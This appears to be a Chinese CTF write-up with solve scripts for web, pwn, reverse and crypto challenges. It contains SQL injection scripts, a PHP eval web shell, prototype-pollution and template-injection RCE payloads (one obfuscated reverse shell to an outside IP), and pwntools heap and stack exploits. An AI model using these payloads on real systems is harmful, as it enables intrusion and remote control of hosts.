[TOC]
Web
zhaopin
#!coding=utf8
import requests
import re
url = "http://052f3f6dbb274376baed75f6c8c3a834f55c15f476cc45d4.changame.ichunqiu.com/"
def login(username,password):
sess = requests.Session()
sess.post(url+"index.php?login",data={
"lname":username,
"lpass":password
})
print(re.findall(r"欢迎你:(.*)<",sess.get(url+"/zhaopin.php").text))
login("-1' union select 1,(SELECT group_concat(flaaag) from flag),3,4,5#",123456)easyphp
import time
import requests
flag = ""
for p in range(1,100):
print p
# 90440A!7-F884
for i in range(0x20,0x7f):
# c = 'a'
# H@XS
c = chr(i)
sql = "SELECT SLEEP(1) FROM user WHERE substr((SELECT group_concat(password) from user),{},1) = 0x{}".format(p,c.encode('hex'))
# print sql
age = """";s:8:"nickname";O:4:"User":3:{s:2:"id";N;s:3:"age";s:%d:"%s";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";s:0:"";s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:7:"noob123";s:6:"dbpass";s:7:"noob123";s:8:"database";s:7:"noob123";s:4:"name";s:8:"admin222";s:8:"password";s:8:"admin222";s:6:"mysqli";N;s:5:"token";N;}}}s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:7:"noob123";s:6:"dbpass";s:7:"noob123";s:8:"database";s:7:"noob123";s:4:"name";s:8:"admin222";s:8:"password";N;s:6:"mysqli";N;s:5:"token";N;}}-----""" % (len(sql),sql)
age = "union"*len(age) + age
# print age
url = "http://531c14aef497447dbbd6fbbe8fc04ebeef3fc54888af41e6.changame.ichunqiu.com/"
# url = "http://127.0.0.1:2333"
# for i in range()
t1=time.time()
requests.post(url+"/update.php",data={
'age':age,
'nickname':''
}).content
t2 = time.time()
# print(t2-t1,c)
if(t2-t1 > 1):
flag += c
print flag,p,c
break
# time.sleep(0.5)easyupload
<?php eval($_POST['a']); // system(xxx)
Blind_inj
import requests
import time
url = "http://7a1d4561509e492199a4debfd69beb73d9884bd1c2c54cc3.changame.ichunqiu.com/"
flag = "^"
while True:
print "next"
for i in "{}-0123456789abcdefghijklmnopqrstuvwxyz":
tmp = flag +"\\" +i
t1=time.time()
requests.get(url,params={
'id':"""-1^(IF((fl4g regexp 0x{}),sleep(1),2))""".format(tmp.encode('hex'))
}).text
t2 = time.time()
# print(t2-t1)
if(t2 - t1 > 1):
flag = tmp
print flag
breakeasysqli_copy
import requests
import time
url = "http://53e15d2716574d48bd6493bf9ac8093eb2b755cbcb2f4855.changame.ichunqiu.com/"
flag = ""
timeset = 1
for p in range(1,100):
print p
for i in "{}-abcdefgl0123456789":
c = i
t1 = time.time()
sql = "SELECT SLEEP({}) FROM table1 WHERE substr((SELECT group_concat(fllllll4g) FROM table1),{},1) = {}".format(timeset,p,hex(ord(c)))
requests.get(url,params={
"id":"""\xdf\x27;set @a=0x{};prepare stmt from @a;EXECUTE stmt;""".format(sql.encode('hex'))
})
t2 = time.time()
# print c,t2-t1,sql
if(t2 - t1 > timeset):
flag += c
print(flag)
breakeasysqli
import requests
url = "http://38daa8c729e64e40b32e203e62f851681dca700c0e8447e7.changame.ichunqiu.com/index.php"
flag = ""
charlist = "-0123456789abcdefgl{}~"
for p in range(1,100):
print p
for i in range(len(charlist)):
# for i in range(0x20,0x7f):
c = charlist[i]
tmp = flag + c
# print tmp
content = requests.post(url,data={
"id":"1 + ((select * from f1ag_1s_h3r3_hhhhh) < (select 1,'{}'))#".format(tmp)
}).text
if("CQGAME" in content):
flag += charlist[i-1]
print flag,i
breakblackList
import requests
url = "http://13ddf249dd974c829659f1acd4723d6bfc8d0b9088974f4c.changame.ichunqiu.com/"
# preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
print(requests.post(url,params={
"inject":"""1';handler `FlagHere` open;handler `FlagHere` read first;#"""
}).text)ezExpress
prototype pollution
import requests
url = "http://101.200.195.106:60073"
sess = requests.Session()
sess.post(url + "/login",json={
"Submit":"register",
"userid":"admın",
"pwd":"123"
}).text
data = {
"__proto__":{
"compileDebug":1,
"self":1,
"outputFunctionName":"a;global.process.mainModule.require('child_process').execSync('***');//"
}
}
print(sess.post(url+'/action',json=data).text)
print(sess.get(url+'/info').text)flaskapp
# coding:utf-8 import requests, re, time from urllib import * from HTMLParser import HTMLParser h = HTMLParser() sess = requests.Session() payload = '''__import__("os").popen("cat /this_is_the_flag.txt").read()''' ss = '' for p in payload: ss += "'"+p+"'+" ss = ss[:-1] test = '''{{{{''.__class__.__base__.__subclasses__()[134].__init__.__globals__['__builtins__']['ev'+'al']({})}}}}'''.format(ss) print test data = { 'csrf_token': 'ImFlMDBkMDA5OTQxM2UwODA0ZTY1NjUxZjYxNTliNDVjMGJhODcyNDYi.XlH51w.rs5sHa4a7JzVM0JSaWeWBLUFyZ0', 'text': test.encode('base64').strip(), 'submit': '提交' } kk = sess.post('http://182.92.243.154:10002/decode',data=data).content start = kk.find('结果 :') kk = kk[start+10:] end = kk.find('</div>') kk = kk[:end] print(h.unescape(kk))
easy_thinking
- thinkphp6.0 Session RCE
- php GC管理 RCE
node_game
HTTP 协议注入,pug模版注入,考虑使用Orange17年blackhat演讲
#!coding=utf8
import requests
import urllib
def gen(st):
pay = ""
for i in st:
pay += chr(0xFF00 + ord(i))
return pay
def genpayload(payload):
ret = ""
for c in payload:
ret += '\\'
ret += "{}".format(oct(ord(c)))[2:]
return ret
payload = """ HTTP/1.1
Host: 127.0.0.1:8081
Connection: keep-alive
POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------785936127467730273918326
User-Agent: PostmanRuntime/7.22.0
Accept: */*
Cache-Control: no-cache
Postman-Token: 7722e258-0abf-40b7-8a6d-5c2e697c0966
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Content-Length: 1000
Connection: close
----------------------------785936127467730273918326
Content-Disposition: form-data; name="file"; filename="sndav.pug"
Content-Type: ../template
- [][$='\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162'][$]('\\147\\154\\157\\142\\141\\154\\56\\160\\162\\157\\143\\145\\163\\163\\56\\155\\141\\151\\156\\115\\157\\144\\165\\154\\145\\56\\162\\145\\161\\165\\151\\162\\145\\50\\47\\143\\150\\151\\154\\144\\137\\160\\162\\157\\143\\145\\163\\163\\47\\51\\56\\145\\170\\145\\143\\123\\171\\156\\143\\50\\47\\142\\141\\163\\150\\40\\55\\143\\40\\42\\142\\141\\163\\150\\40\\55\\151\\40\\76\\46\\40\\57\\144\\145\\166\\57\\164\\143\\160\\57\\61\\62\\62\\56\\61\\65\\62\\56\\62\\63\\60\\56\\61\\66\\60\\57\\62\\63\\63\\63\\40\\60\\76\\46\\61\\42\\47\\51')()
----------------------------785936127467730273918326--
"""
payload2 = ""
payload = payload.replace('\n','\r\n')
for i in payload:
payload2 += chr(0xFF00 + ord(i))
# url = "http://localhost:8081"
url = "http://182.92.243.154:33321"
# print urllib.quote(payload)
print(requests.get(url+"/core",params={
'q':payload2
}).text)
print("====")
# print(requests.get(url+"/?action=sndav").text)Pwn
BFnote
栈迁移+ret2dl
#coding:utf-8 from pwn import * from roputils import * path = './BFnote' local = 1 attach = 0 P = ELF(path) elf = ELF(path) context(os='linux',arch='i386',terminal=['tmux','split','-h']) context.log_level = 'debug' if local == 1: p = process(path) if context.arch == 'amd64': libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: libc = ELF('/lib/i386-linux-gnu/libc.so.6') else: p = remote() rop = ROP(path) #ROP继承了ELF类,下面的section, got, plt都是调用父类的方法 bss_addr = rop.section('.bss')+0x800 read_got = rop.got('read') read_plt = rop.plt('read') #gdb.attach(p,'b *0x08048973') p.recvuntil('Give your description : ') payload = '\x11'*0x32+'\x11'*4+'\x00'*4+p32(0x0804A060+4) p.send(payload) p.recvuntil('Give your postscript : ') buf = rop.call(read_plt, 0, bss_addr-0x14, 0x400) #call可以通过某个函数的plt地址方便地进行调用 buf += p32(0x080489db) buf += p32(bss_addr-0x14) buf += p32(0x08048578) p.send(buf) p.recvuntil('Give your notebook size : ') p.send(str(0x20000)) p.recvuntil('Give your title size : ') p.send(str(0xf7dcb714-0xf7daa008-0x10)) p.recvuntil('please re-enter :\n') p.send(str(0x10)) p.recvuntil('Give your title : ') p.send('\x33'*0x10) p.recvuntil('Give your note : ') p.send('\x11'*4) # plt0 = 0x8048450 rel_plt = 0x80483d0 dynsym = 0x80481d8 dynstr = 0x80482c8 print "plt0: "+hex(plt0) print "rel_plt: "+hex(rel_plt) print "dynsym: "+hex(dynsym) print "dynstr: "+hex(dynstr) raw_input() libc_start_main = 0x0804a024 #0x14 payload = p32(0)+p32(plt0)+p32(0x2498)+p32(0)+p32(bss_addr) print hex(len(payload)) payload += "/bin/sh".ljust(0x20,'\x00') payload += 'system\x00\x00' fake_r_info = (((((bss_addr+0x30+8) - dynsym) / 0x10) << 8) | 0x07) fake_rel = p32(libc_start_main)+p32(fake_r_info) payload += fake_rel payload += '\x00'*8 fake_str_off = (bss_addr+0x20) - dynstr fake_sym = p32(fake_str_off)+p32(0)*2+chr(0x12)+chr(0)+p16(0) payload += fake_sym p.send(payload) p.interactive()
interested
%a泄露libc,UAF get shell
#coding=utf-8
from pwn import *
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)
context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./interested')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if debug:
p = process('./interested')
else:
p = remote('123.56.85.29',3041)
def Add(sz1,sz2,content1='1',content2='2'):
p.sendlineafter("> Now please tell me what you want to do :","1")
p.recvuntil("> O's length : ")
p.sendline(str(sz1))
p.recvuntil("> O : ")
p.send(content1)
p.recvuntil("> RE's length : ")
p.sendline(str(sz2))
p.recvuntil("> RE : ")
p.send(content2)
def Mod(idx,content1,content2):
p.sendlineafter("> Now please tell me what you want to do :","2")
p.sendlineafter("> Oreo ID : ",str(idx))
p.sendafter("> O : ",content1)
p.sendafter("> RE : ",content2)
def View(idx):
p.sendlineafter("> Now please tell me what you want to do :","4")
p.sendlineafter("> Oreo ID : ",str(idx))
def Delete(idx):
p.sendlineafter("> Now please tell me what you want to do :","3")
p.sendlineafter("> Oreo ID : ",str(idx))
def Check():
p.sendlineafter("> Now please tell me what you want to do :","0")
def exp():
#leak libc
payload = "OreOOrereOOreO"
#%3ok->libc?
#%6ok->text
payload += "%a%a"
p.recvuntil("Input your code please:")
p.send(payload)
Check()
p.recvuntil("Your Code is OreOOrereOOreO0x0.0")
data = p.recvuntil("p-",drop=True)
libc_base = int(data,16) - (0x7f426c81d6a3-0x7f426c458000)
log.success("libc base => " + hex(libc_base))
#UAF get shell
Add(0x20,0x60)#1
Add(0x20,0x60)#2
Delete(1)
Mod(1,p64(0),p64(libc_base+libc.sym['__malloc_hook']-0x23))
Add(0x20,0x60)
shell_addr = libc_base + gadgets[2]
#gdb.attach(p)
Add(0x20,0x60,'a','\x00'*0x13+p64(shell_addr))
Delete(2)
Delete(2)
p.interactive()
exp()borrow_stack
基础栈迁移
#coding=utf-8
from pwn import *
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)
context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./borrowstack')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if debug:
p = process('./borrowstack')
else:
p = remote('123.56.85.29',3635)
bank = 0x601080
leave_ret = 0x0000000000400699
read_plt = elf.plt['read']
read_got = elf.got['read']
csu_start = 0x4006fa
csu_end = 0x4006e0
puts_got = elf.got['__libc_start_main']
puts_plt = elf.plt['puts']
p_rdi = 0x0000000000400703
p_rsi_r15 = 0x0000000000400701
def csu(rbx,rbp,r12,r13,r14,r15,retn_addr,rbp2):
#rbx=0
#rbp=1
#r15=edi
#r14=rsi
#r13=rdx
#r12=target
payload = p64(csu_start)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
payload += p64(csu_end)
payload += 'a'*0x10+p64(rbp2)+'a'*0x20
payload += p64(retn_addr)
return payload
def exp():
#leak libc
#gdb.attach(p,'b* 0x4006e0')
p.recvuntil("Welcome to Stack bank,Tell me what you want")
payload = 'a'*0x60+p64(bank)+p64(leave_ret)
p.send(payload)
p.recvuntil("Done!You can check and use your borrow stack now!")
#payload = p64(bank+0x200)+p64(p_rdi)+p64(puts_got)+p64(elf.plt['puts'])
payload = "/bin/sh\x00"+csu(0,1,read_got,0x400,bank+0x400,0,leave_ret,bank+0x400)
p.send(payload)
raw_input()
payload = p64(bank+0x500)+p64(p_rdi)+p64(puts_got)+p64(puts_plt)
payload += csu(0,1,read_got,0x200,bank+0x500,0,leave_ret,bank+0x500)
p.send(payload)
p.recvline()
libc_base = u64(p.recvline().strip('\n').ljust(8,'\x00')) - libc.sym['__libc_start_main']
log.success("libc base => " + hex(libc_base))
#
payload = p64(libc_base+libc.sym['system'])+csu(0,1,bank+0x500,0,0,bank,leave_ret,bank)
raw_input()
p.send(payload)
p.interactive()
exp()excited
fbatk读flag
#coding:utf-8 from pwn import * path = './excited' local = 0 attach = 0 #P = ELF(path) context(os='linux',arch='amd64',terminal=['terminator','-x','sh','-c']) context.log_level = 'debug' if local == 1: p = process(path) if context.arch == 'amd64': libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: libc = ELF('/lib/i386-linux-gnu/libc.so.6') else: p = remote('123.56.85.29',6484) def new(size1,content1,size2,content2): p.recvuntil('> Now please tell me what you want to do :') p.sendline('1') p.recvuntil('length : ') p.sendline(str(size1)) p.recvuntil('> ba : ') p.send(content1) p.recvuntil('length : ') p.sendline(str(size2)) p.recvuntil('> na : ') p.send(content2) def delete(idx): p.recvuntil(' Now please tell me what you want to do :') p.sendline('3') p.recvuntil(' ID : ') p.sendline(str(idx)) def show(idx): p.recvuntil('ow please tell me what you want to do :') p.sendline('4') p.recvuntil('ID : ') p.sendline(str(idx)) new(0x20,'\x00',0x50,'\x00') new(0x20,'\x11',0x50,'\x11') new(0x10,'\x22',0x10,'\x22') delete(0) delete(1) delete(0) delete(2) new(0x20,'\x22',0x50,p64(0x602098)) new(0x30,'\x33',0x50,'\x00') new(0x40,'\x44',0x50,'\x00') new(0x60,'\x55',0x50,'\x55') #6 show(6) p.recvuntil('U') p.recvuntil('U') flag = p.recvuntil('\n') log.success('flag = f'+flag) if attach == 1: gdb.attach(p) p.interactive()
Drangon
爆破攻击力,杀死龙,fbatk
#coding:utf-8 from pwn import * path = './pwn' local = 1 attach = 0 #P = ELF(path) context(os='linux',arch='amd64',terminal=['terminator','-x','sh','-c']) context.log_level = 'debug' if local == 1: p = process(path) if context.arch == 'amd64': libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: libc = ELF('/lib/i386-linux-gnu/libc.so.6') else: p = remote('123.56.85.29',4978) def give_up(len,name): p.recvuntil('choose:') p.sendline('1') p.recvuntil('choose:') p.sendline('3') p.recvuntil('length:') p.sendline(str(len)) p.recvuntil('name:') p.send(name) p.recvuntil('choose:') p.sendline('1') for i in range(24): p.recvuntil('choose:') p.sendline('1') p.recvuntil('7. Give up') p.sendline('6') p.recvuntil('7. Give up') p.sendline('5') p.recvuntil('choose:') p.sendline('2') p.recvuntil('Give up') p.sendline('2') p.recvuntil('how long your name:') p.sendline(str(0x90)) sleep(1) p.send('\x11'*0x90) p.recvuntil('choose:') p.sendline('3') p.recvuntil('name : ') libcbase = u64(p.recv(6).ljust(8,'\x00')) - (0x7ffff7839b78-0x00007ffff7475000) log.success('libcbase = '+hex(libcbase)) give_up(0x60,'\x11'*0x60) give_up(0x60,'\x22'*0x60) p.recvuntil('choose:') p.sendline('5') p.recvuntil('choose:') p.sendline('4') give_up(0x60,p64(libcbase+libc.sym['__malloc_hook']-0x23)) give_up(0x60,'\x00') give_up(0x60,'\x00') one_gadget = [0x4526a,0x45216,0xf02a4,0xf1147] payload = '\x00'*0xb + p64(libcbase+one_gadget[0]) + p64(libcbase+libc.sym['__libc_realloc']+2) give_up(0x60,payload) p.interactive()
signin
利用tcache不满时,fastbinbin多余会放入tcache的操作让ptr作为fake_chunk其fd写入一个heap地址调用后门
#coding=utf-8
from pwn import *
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)
context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./pwn')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if debug:
p = process('./pwn')
else:
p = remote('123.56.85.29',4205)
def Add(idx):
p.recvuntil('your choice?')
p.sendline('1')
p.recvuntil("idx?")
p.sendline(str(idx))
def Edit(idx,content):
p.recvuntil('your choice?')
p.sendline('2')
p.recvuntil("idx?")
p.sendline(str(idx))
sleep(0.02)
p.send(content)
def Delete(idx):
p.recvuntil('your choice?')
p.sendline('3')
p.recvuntil("idx?")
p.sendline(str(idx))
def Backdoor():
p.recvuntil('your choice?')
p.sendline('6')
def exp():
target = 0x4040c0
ptr_lis = 0x4040e0
for i in range(9):
Add(str(i))
for i in range(9):
Delete(str(i))
Edit(8,p64(target-0x10))
Add(10)
#gdb.attach(p)
Backdoor()
p.interactive()
exp()Re
奇怪的安装包
String搜索,发现有Nullsoft字样,去百度发现是NSIS,专门用来写安装包程序的脚本语言
百度发现7z可以直接解出nsi脚本,发现就是每个字符异或1之后比较。
EXP:
Str="gm`fzd787`7bb,g72d,592b,8`g1,cg96813e8d``|"
Flag=""
For i in Str:
Flag+=(Str^1)
Print Flag吃鸡神器
ida打开,字符串定位找到错误函数,一路回溯到判断函数,
发现核心代码就是将用户名进行一波处理生成一个DWORD,在将输入的密码字符串转化为hex的DWORD进行比较
所以直接输入lubenwei用户名下断点判断即可
这个dword是0x41d26f00
所以flag就是flag{41d26f00}
EasyVM
从名字知道是个虚拟机,定位到operate函数,然后搞清楚opcode格式
写个EXP分析下opcode,然后开始直接看翻译过的代码
#include<cstdio>
#include<cstdlib>
using namespace std;
//flag{vm_is_not_easy}
unsigned int opcode[1000]={opcodes here..};
char *parseNum(int num)
{
char *str=(char*)malloc(20);
if(num>=200)
sprintf(str,"num(%d)",(char)(num+56));
else if(num==101)
sprintf(str,"reg1");
else if(num==102)
sprintf(str,"reg2");
else
sprintf(str,"arr[%d]",num);
return str;
}
int main()
{
int p;
for(p=0;opcode[p]!=255;p++)
{
if(opcode[p]==1)
{
int a=opcode[p+1],b=opcode[p+2];
printf("mov %s,%s\n",parseNum(a),parseNum(b));
p+=2;
}
else if(opcode[p]==2)
{
int a=opcode[p+1],b=opcode[p+2];
printf("xor %s,%s\n",parseNum(a),parseNum(b));
p+=2;
}
else if(opcode[p]==3)
{
int a=opcode[p+1],b=opcode[p+2];
printf("add %s,%s\n",parseNum(a),parseNum(b));
p+=2;
}
else if(opcode[p]==4)
{
int a=opcode[p+1],b=opcode[p+2];
printf("sub %s,%s\n",parseNum(a),parseNum(b));
p+=2;
}
else if(opcode[p]==5)
{
int a=opcode[p+1];
printf("inc %s\n",parseNum(a));
p++;
}
else if(opcode[p]==6)
{
int a=opcode[p+1];
printf("dec %s\n",parseNum(a));
p++;
}
else
printf("ERROR!\n");
}
return 0;
}42
Ida打开发现最后的判断是个XXX+YYY+ZZZ==42的操作,所以这个42肯定有问题,况且程序不可能跑出解的,范围太大了
到网上搜,发现这个是个什么丢番图方程,目前有一个已知解
x=-80538738812075974,y=80435758145817515,z=12602123297335631;
继续回退,发现有个异或操作,dump出来数组异或,在回退发现是字符串转化为16进制,最后根据XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXX的格式读取flag内数据
所以写代码反过来操作即可
#include<cstdio>
#include<windows.h>
using namespace std;
long long x=-80538738812075974,y=80435758145817515,z=12602123297335631;
long long x0=0xFEE1DEAF76BDF08F,y0=0x11DC37D846F5F42,z0=0x2CC5D914031D68;
unsigned char strs[]="\xDE\xEC\xCF\x30\xB5\x98\xD3\xEA\x14\xE9\x49\x6E\x8E\xB4\x27";
unsigned char keys[]="3nder5tandf10@t";
//flag{ed82ab5-5c7a-da78-b7a8-d2f5fbef453}
unsigned long long xors(unsigned long long t,unsigned long long q)
{
return t^q;
}
int main()
{
printf("%lld\n",x*x*x+y*y*y+z*z*z);
for(int i=0;i<15;i++)
{
strs[i]^=keys[i];
printf("%X",strs[i]);
}
//printf("%s\n",strs);
return 0;
}Analysis of virus:
真·病毒分析,打开后发现是AGCT,AGCU什么的,多半是DNA/RNA转录翻译之类的操作,最后还发现有个蛋白质链表,所以实锤
具体逻辑就是判断起始密码子和结束密码子,再将三个一组的密码子转化为氨基酸,再做比较,但是这里存在多解的可能,MD5的限定下似乎还是多解
from md5 import *
index=['Met','Cys','Leu','Ala','Arg','Leu','Phe','Ser','Ile','Leu','Asn','Val','Cys','Gly','Lys','Leu','Stp']
def getList(pro):
Met=['AUG']
Cys=['UGU','UGC']
Leu=['CUU','CUC','CUA','CUG']
Ala=['GCU','GCC','GCA','GCG']
Arg=['AGA','AGG']
Phe=['UUU','UUC']
Ser=['UCU','UCC','UCA','UCG']
Ile=['AUU','AUC','AUA']
Asn=['AAU','AAC']
Val=['GUU','GUC','GUA','GUG']
Gly=['GGU','GGC','GGA','GGG']
Lys=['AAA','AAG']
Stp=['UAA','UAG','UGA']
if pro=='Met':
return Met
elif pro=='Cys':
return Cys
elif pro=='Leu':
return Leu
elif pro=='Ala':
return Ala
elif pro=='Arg':
return Arg
elif pro=='Phe':
return Phe
elif pro=='Ser':
return Ser
elif pro=='Ile':
return Ile
elif pro=='Asn':
return Asn
elif pro=='Val':
return Val
elif pro=='Gly':
return Gly
elif pro=='Lys':
return Lys
elif pro=='Stp':
return Stp
else:
return None
def dfs(id,str):
if id>16:
#print(str)
if md5(str).hexdigest()[0:6]=='e03657':
print(str)
return
tmp=str
for p in getList(index[id]):
tmp+=p
dfs(id+1,tmp)
tmp=str
return
dfs(0,"")BabyMac
逻辑比较简单,将输入40bytes每四个一组与一个数组进行计算操作,得到了80bytes目标数组,再将目标数组与程序内部数据比较
所以可以试着爆搜,先将那个初始数组dump出来,就可以进行暴力求解了,考虑到flag格式ascii,时间可以优化一下
#include<cstdio>
#include<cstdlib>
using namespace std;
unsigned long long arr[33]=
{
1145141919810LL,
11451419198005LL,
88175927824097LL,
59547379826567LL,
85885643980259LL,
111078766210607LL,
34354257570550LL,
4580567632918LL,
4580567587375LL,
56111953885801LL,
73289082498024LL,
6870850780444LL,
17177127320052LL,
73289079912751LL,
4580561769860LL,
75579354889270LL,
65273065791251LL,
13741655762243LL,
54966717600097LL,
104207725601353LL,
112223529937564LL,
40079210785300LL,
96190408447959LL,
27480380444247LL,
106492147280229LL,
56099851547153LL,
44636329825478LL,
101869220767707LL,
41128288922888LL,
67369732888265LL,
11064138437126LL,
26708844553169LL
};
unsigned long long flag[11]={
0x30970372813D2,0x2D3A89BCA52AC,0x31551E79154A2,0x2C522E9A5298A,
0x2A61367C5C698,0x264491C01CAFD,0x26CA3A06C98B3,0x2DACBD12FB903,
0x2E470707574E1,0x309E5DC39A9A7};
unsigned long long check(unsigned long long num)
{
unsigned long long bit=num;
unsigned long long ans=0;
for (int i=31;i>=0;i--)
{
ans+=arr[i]*(bit & 1);
bit>>=1;
}
return ans;
}
void trys(int c)
{
bool okk=false;
for(unsigned char a1=33;a1<=136;a1++)
for(unsigned char a2=33;a2<=136;a2++)
for(unsigned char a3=33;a3<=136;a3++)
for(unsigned char a4=33;a4<=136;a4++)
{
char *p=(char*)malloc(sizeof(int));
*p=a1;
*(p+1)=a2;
*(p+2)=a3;
*(p+3)=a4;
unsigned int ls=*((unsigned int *)p);
if(check(ls)==flag[c])
{
printf("%c%c%c%c",a1,a2,a3,a4);
okk=true;
break;
}
}
if(!okk)
printf("ERROR\n");
}
int main()
{
for(int i=0;i<10;i++)
trys(i);
return 0;
}Crypto
easy_RSA
#!coding=utf8
from gmpy2 import invert
from Crypto.Util.number import long_to_bytes
from z3 import *
n = 7772032347449135823378220332275440993540311268448333999104955932478564127911903406653058819764738253486720397879672764388694000771405819957057863950453851364451924517697547937666368408217911472655460552229194417053614032700684618244535892388408163789233729235322427060659037127722296126914934811062890693445333579231298411670177246830067908917781430587062195304269374876255855264856219488896495236456732142288991759222315207358866038667591630902141900715954462530027896528684147458995266239039054895859149945968620353933341415087063996651037681752709224486183823035542105003329794626718013206267196812545606103321821
c = 2082303370386500999739407038433364384531268495285382462393864784029350314174833975697290115374382446746560936195242108283558410023998631974392437760920681553607338859157019178565294055755787756920003102506579335103169629546410439497570201554568266074421781047420687173530441469299976286281709526307661219925667082812294328343298836241624597491473793807687939912877432920934022304415340311930199467500833755390490763679081685821950332292303679223444816832000945972744492944044912168217765156110058474974887372388032286968936052010531850687361328326741707441938740295431353926037925950161386891437897990887861853097318
p_q_1= 2**1024 -1 - 65537
pq = n
p = Int('p')
q = Int('q')
solve(p+q ==p_q_1,p*q == n) # 求解等式
# 得到P,Q,RSA解一下即可gmcn
首先lfsr已知明文攻击解开png,ECC加密中,根据定理得知A=p
待定系数获得B,解EC上得离散对数获得m得可行解,factor Q的阶得到周期。穷举即可得到flag
warm_up
# coding:utf-8
from Crypto.Util.number import *
from sympy.ntheory.residue_ntheory import sqrt_mod
import sympy.ntheory.residue_ntheory
import gmpy2
def factor_(nn, *args, **kwargs):
t = 0
while nn % p == 0:
t += 1
nn //= p
s = 0
while nn % q == 0:
s += 1
nn //= q
if nn != 1:
print(nn)
return None
return {p: t, q: s}
sympy.ntheory.residue_ntheory.factorint = factor_
c1 = 9977992111543474765993146699435780943354123551515555639473990571150196059887059696672744669228084544909025528146255490100789992216506586730653100894938711107779449187833366325936098812758615334617812732956967746820046321447169099942918022803930068529359616171025439714650868454930763815035475473077689115645913895433110149735235210437428625515317444853803605457325117693750834579622201070329710209543724812590086065816764917135636424809464755834786301901125786342127636605411141721732886212695150911960225370999521213349980949049923324623683647865441245309856444824402766736069791224029707519660787841893575575974855
n1 = 15653165971272925436189715950306169488648677427569197436559321968692908786349053303839431043588260338317859397537409728729274630550454731306685369845739785958309492188309739135163206662322980634812713910231189563194520522299672424106135656125893413504868167774287157038801622413798125676071689173117885182987841510070517898710350608725809906704505037866925358298525340393278376093071591988997064894579887906638790394371193617375086245950012269822349986482584060745112453163774290976851732665573217485779016736517696391513031881133151033844438314444107440811148603369668944891577028184130587885396017194863581130429121
n2 = 16489315386189042325770722192051506427349661112741403036117573859132337429264884611622357211389605225298644036805277212706583007338311350354908188224017869204022357980160833603890106564921333757491827877881996534008550579568290954848163873756688735179943313218316121156169277347705100580489857710376956784845139492131491003087888548241338393764269176675849400130460962312511303071508724811323438930655022930044289801178261135747942804968069730574751117952892336466612936801767553879313788406195290612707141092629226262881229776085126595220954398177476898915921943956162959257866832266411559621885794764791161258015571
key_encode = 154190230043753146353030548481259824097315973300626635557077557377724792985967471051038771303021991128148382608945680808938022458604078361850131745923161785422897171143162106718751785423910619082539632583776061636384945874434750267946631953612827762111005810457361526448525422842867001928519321359911975591581818207635923763710541026422076426423704596685256919683190492684987278018502571910294876596243956361277398629634060304624160081587277143907713428490243383194813480543419579737033035126867092469545345710049931834620804229860730306833456574575819681754486527026055566414873480425894862255077897522535758341968447477137256183708467693039633376832871571997148048935811129126086180156680457571784113049835290351001647282189000382279868628184984112626304731043149626327230591704892805774286122197299007823500636066926273430033695532664238665904030038927362086521253828046061437563787421700166850374578569457126653311652359735584860062417872495590142553341805723610473288209629102401412355687033859617593346080141954959333922596227692493410939482451187988507415231993
e1=125794
e2=42373
'''
n1=p*q
n2=p*r
n3=p*q*s
c1=pow(s,e1,n1)
Key=int(KEY.encode('hex'),16)
key_encode=pow(Key,e2,n3)
'''
p = gmpy2.gcd(n1,n2)
q = n1//p
d1_2 = gmpy2.invert(e1//2, (p-1) * (q-1))
s_2 = pow(c1, d1_2, n1)
n = p * q
phi = (p - 1) * (q - 1)
s_list = [m for m in sqrt_mod(s_2, n1, True)]
for s in s_list:
n3 = p*q*s
d2 = gmpy2.invert(e2, (p-1)*(q-1)*(s-1))
key = pow(key_encode, d2, n3)
print(hex(key))
key = 0x4ddea3dde9a7b8950545cb8cbc26ea8ba8c7fd989f2a0ca78c733a7849e359ba2b72a5a0bdbd71b9d954
enc = 17403902166198774030870481073653666694643312949888760770888896025597904503707411677223946079009696809
dec = enc ^ key
'''
dec=(dec^dec<<200 )&mask
'''
dec=(dec^dec<<200 )
print(long_to_bytes(dec))simple_math
